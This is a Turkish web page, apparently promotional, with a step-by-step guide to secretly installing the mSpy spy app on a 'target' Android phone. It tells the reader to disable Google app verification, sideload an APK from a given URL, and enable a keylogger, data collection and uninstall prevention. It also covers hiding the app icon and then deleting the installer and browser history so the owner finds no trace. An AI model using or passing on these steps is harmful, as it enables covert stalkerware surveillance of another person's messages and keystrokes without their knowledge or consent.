Android Kurulumu 2020

Android Telefonlarına mSpy Kurulumu

Android telefonlara mSpy kurulumu gerçekleştirdikten sonra bu programla neler yapabileceğinizi gördüğünüzde çok şaşıracaksınız. Artık mSpy kurulum Türkçe seçeneğinizin de olduğunu biliyor muydunuz?

RESİMLİ ANLATIMA GEÇİN

Burada, mSpy hedef telefona nasıl yüklenir, bunun için ne yapmanız gerekir ve ayrıca mSpy casus programı ile daha neler yapabilirsiniz bunları öğreneceksiniz.

mSpy’ı Android telefona kurabilmek için takip etmek istediğiniz cihaza erişiminiz ve ayrıca internet bağlantısının olması gerekmektedir.

Android OS’un sağladığı yüksek seviyede özelleştirme imkanı sayesinde size sunulan talimat adımları gerçek telefonda gördüğünüzden biraz farklı olabilir. Bunun yanında tüm menü bölümleri birbirine benzerdir ve kurulumu kolayca gerçekleştirebilirsiniz. Mesela, ‘Uygulamalar’ yerine ‘Aplike’, ‘Uygulama yöneticisi’ veya ‘Uygulamayı Yönet seçenekleri karşınıza çıkabilir.

Öncelikle Yapmanız Gereken Hazırlıklar

Kurulum öncesinde lütfen hedef telefondaki ‘Ayarlar’→ ‘Güvenlik’ bölümünde ‘Bilinmeyen Kaynaklar’ın yanında TAMAM işaretinin olduğundan emin olun ve Uygulama Doğrulama’yı devre dışı bırakın. Uygulama Doğrulama’yı devre dışı bırakabilmek için Ayarlar – Google – Güvenlik – Uygulama Doğrulama – menülerini takip ederek “Cihazı güvenlik tehditlerine karşı tarayın” (bazen Ayarlar – Uygulamalar – Google’da bulmaktadır) seçeneğini devre dışı bırakabilirsiniz. Bu sayede uygulamaları doğrula seçeneğini kapatmış olacaksınız.

mSpy kurulum hazırlık

mSpy Apk’yı İndirin

mSpy apk indir işlemi için Ana giriş ekranından Tüm Uygulamalar’ı (mevcut tüm uygulamaların listesi) açarak Google Chrome’u seçmelisiniz.

mSpy kurulum Google

Chrome ana sayfası açıldıktan sonra adres satırına http://a22z.net/a yazın ve Git düğmesine basın. Daha sonra, sadece ekranda göreceğiniz bir güvenlik kodunu girerek indirme işlemine başlayabilirsiniz.

mSpy kurulum indir

Lütfen doğrudan indirme bağlantısı olan http://a22z.net/a’nın yeni bir web sayfası açmadan arka planda indirmeye başlayacağını unutmayın. Ancak indirme işleminin başladığını gösteren küçük bir mesaj görmelisiniz.

Artık yapmanız gereken bir işlem kalmadı. Giriş sayfanızdan Tüm Uygulamalar bölümüne dönebilir ve İndirilenler sayfasını (Download) açarak bt.apk dosyasını görebilirsiniz. Bt.apk dosyasına tıkladığınızda mSpy yükleme işlemi başlayacaktır.

mSpy kurulum indirelen

mSpy Apk Uygulamasını Kurun!

1. mSpy yükle işlemini gerçekleştirmek ve uygulamayı kurabilmek için bt.apk dosyasını açtıktan sonra sıra ile yapmanız gerekenler kısaca şu şekildedir. Sonraki → Yükle → Aç ‘a basın.

mSpy kurulum kurun

2. EULA’yı dikatli bir şekilde okumanız ve devam etmek için lisans sözleşmesini kabul etmeniz yeterlidir.

3. Kaldırma işlemini önleyin seçeneğini etkinleştirmeniz gerekmektedir. Menüdeki bu madde için ‘Etkinleştir’i tıklayın.

4. Tuş Vuruşu Kaydedici (Keylogger) izlemeye izin verin seçeneğinde ‘OK’ e basın. Framework Güncelleme Hizmeti’ni açmak için ‘Tamam’a basın.

5. Verilerin toplamasına izin verin seçeneği için tekrar ‘OK’ e basın ve ‘Update Service’ seçeneğini de açın. Ayrıca, alttaki ‘Kullanım erişimine izin ver’ seçeneğini de açın.

6. Simge gizlemek istiyorum/istemiyorum seçenekleri sunan menüden istediğinizi de seçebilirsiniz.

7. Kayıt kodunu buraya ekleyin yazan yere kayıt kodunuzu girin. Böylelikle mSpy nasıl yüklenir ya da mSpy telefona nasıl yüklenir sorularınız cevap bulmuş oldu ve kurulumu başarıyla tamamladınız!

mSpy kurulum hoş geldiniz

Hedef Telefondaki mSpy İzini Tamamen Kaldırmak

Tarayıcı geçmişi ve Yükleme paketini silerek hedef telefondaki izleri kaldırabilirsiniz.

mSpy kurulum tarayıcı temizle

Tüm işlemleriniz bittiğine göre artık bt.apk dosyasını İndirilenler klasöründen silebilirsiniz. Bt.apk dosyasını tıklayabilirsiniz ve çöp işaretini gördüğünüzde seçtiğiniz dosyayı silmek için basabilirsiniz.

Aynı şekilde Chrome’a gidip Tarayıcı’nın geçmişini silebilirsiniz → Menü düğmesine tıklayın → Ayarlar → Güvenlik ve Gizlilik → Tarama geçmişini temizle seçeneği sayesinde Chrome geçmişini temizleyebilirsiniz.

mSpy kurulum temizle

mSpy kurulum son

 

Gördünüz mü! Çok basit değil mi? Bu kolay adımlar neticesinde artık hedef telefonda mSpy izi kalmadı.